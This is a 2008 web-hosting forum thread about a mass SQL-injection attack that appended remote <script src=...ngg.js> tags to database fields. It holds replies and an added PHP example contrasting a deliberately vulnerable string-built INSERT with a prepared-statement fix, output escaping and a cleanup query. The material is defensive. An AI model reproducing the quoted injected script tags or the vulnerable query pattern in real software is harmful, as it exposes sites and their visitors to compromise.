How to prevent hacking the database by entering javascript



kjomyjose
07-18-2008, 12:38 PM
Four times my MSSQL Server has been hacked. Somebody inserts into most of the tables' text and varchar fields, appending the following to their values: <script src=http://www.pyttco.com/ngg.js></script>

I changed my FTP username and password, and my database username and password. Still they are able to insert different scripts like

<script src=http://www.cdport.eu/ngg.js></script>
<script src=http://www.drvadw.com/ngg.js></script>
<script src=http://www.bnrc.ru/ngg.js></script>

This is a virus.

I spoke to my hosting company; they say they do not provide any security against hacking.

Can anybody tell me how I can prevent this?

Thanks

Dravu
07-18-2008, 02:43 PM
Four times my MSSQL Server has been hacked.
That's SQL injection and, furthermore, not filtering your output. Changing passwords won't help against that. It's a security hole in your coding. What script are you using that deals with those tables?

tsiou
07-18-2008, 08:59 PM
Four times my MSSQL Server has been hacked.

Do you mean MySQL?

If it's MSSQL, move on to MySQL and Linux :)
If you own the server, try to install mod_security for Apache.
If you have forms like a newsletter, try to check the input with PHP functions
like stripslashes, htmlentities, eregi and some if/else.
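The two defects Dravu names (SQL injection and unfiltered output) and the PHP-side checks tsiou suggests, shown together as an added example. This is not code from the thread or from either poster: it uses a PDO prepared statement for the query side rather than stripslashes, escapes stored text with htmlspecialchars at render time, and adds a query that lists rows already carrying an injected tag. The `newsletter` table, its columns, the addresses and the `example.invalid` host are made up for the demo; SQLite in memory is used only so the script runs offline, and swapping the DSN for a MySQL or MSSQL one leaves the rest unchanged.

```php
<?php
// Added example, not from the thread. Table, column names and sample values are
// hypothetical; the SQLite DSN is a stand-in for the real MySQL/MSSQL connection.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE newsletter (id INTEGER PRIMARY KEY, email TEXT, name TEXT)');

// VULNERABLE: the submitted value is spliced into the SQL text. A value that
// closes the quoted literal lets the sender run SQL of their own, which is how
// every text column can end up with a <script> tag appended to it.
function subscribeVulnerable(PDO $pdo, string $email, string $name): void
{
    $pdo->exec("INSERT INTO newsletter (email, name) VALUES ('$email', '$name')");
}

// FIXED: a prepared statement sends the values separately from the query text,
// so quotes and semicolons inside them are only data.
function subscribeSafe(PDO $pdo, string $email, string $name): void
{
    $stmt = $pdo->prepare('INSERT INTO newsletter (email, name) VALUES (:email, :name)');
    $stmt->execute([':email' => $email, ':name' => $name]);
}

// OUTPUT FILTERING: escape stored text when it is rendered. Rows that were
// already poisoned are then shown as literal text instead of loading the script.
function renderName(string $storedName): string
{
    return htmlspecialchars($storedName, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// CLEAN-UP CHECK: list rows that still carry an injected tag, for review.
function findPoisonedRows(PDO $pdo): array
{
    return $pdo->query("SELECT id, name FROM newsletter WHERE name LIKE '%<script%'")
               ->fetchAll(PDO::FETCH_ASSOC);
}

// The vulnerable path breaks on an ordinary apostrophe, which is the same
// weakness an attacker uses on purpose.
try {
    subscribeVulnerable($pdo, 'bob@example.com', "O'Brien");
} catch (PDOException $e) {
    echo 'vulnerable path failed on a plain apostrophe: ', $e->getMessage(), PHP_EOL;
}

// Constructed input in the shape of the thread's symptom (placeholder host).
$tainted = 'Alice<script src=http://example.invalid/ngg.js></script>';

// Through the safe path the value is stored verbatim and never treated as SQL.
subscribeSafe($pdo, 'alice@example.com', $tainted);

foreach (findPoisonedRows($pdo) as $row) {
    // The stored value still contains the tag; escaped output cannot run it.
    echo $row['id'], ': ', renderName($row['name']), PHP_EOL;
}
```

Run it with `php` on the command line. The `findPoisonedRows` query is the triage step for the situation in the first post: it shows which rows were already modified so they can be cleaned once the insertion path is closed, since escaping on output stops the script from running but does not remove it from the data.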

nobaloney
07-20-2008, 11:36 AM
Four times my MSSQL Server has been hacked.
Are you asking about the Microsoft product MSSQL, or the open source product MySQL?

If the Microsoft product, then you won't really get too much help here; this is a forum for owners/users of the DirectAdmin control panel, running on Linux and on FreeBSD. I doubt too many of us have any strong experience in MSSQL, and even if we did, this would be the wrong place for the discussion.

Jeff